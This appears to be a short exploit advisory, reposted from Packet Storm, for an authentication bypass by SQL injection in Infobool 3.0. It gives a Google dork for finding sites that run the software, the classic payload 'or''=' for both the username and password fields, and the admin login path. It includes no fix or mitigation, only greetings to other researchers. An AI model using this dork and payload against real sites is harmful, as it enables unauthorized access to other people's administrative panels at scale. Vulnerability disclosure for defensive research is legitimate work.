Infobool 3.0 SQL Injection

Infobool version 3.0 suffers from a remote SQL Injection vulnerability.

SHA-256 | 13c3cae478e9d3701df230c7754ee9fab6ea6f02779e6b7c2bb4a3fb4a785c51

Download

====================================================================================================================================
| # Title     : Infobool v 3.0 Auth By Pass Vulnerability                                                                          |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | 
| # Vendor    : https://www.infobool.com/                                                                                          |  
| # Dork      : "© 2017 All rights reserved. Powered By: Infobool"                                                                 |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : user : 'or''=' & Pass : 'or''='

[+] https://www.com/admin/


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Source: packetstormsecurity.com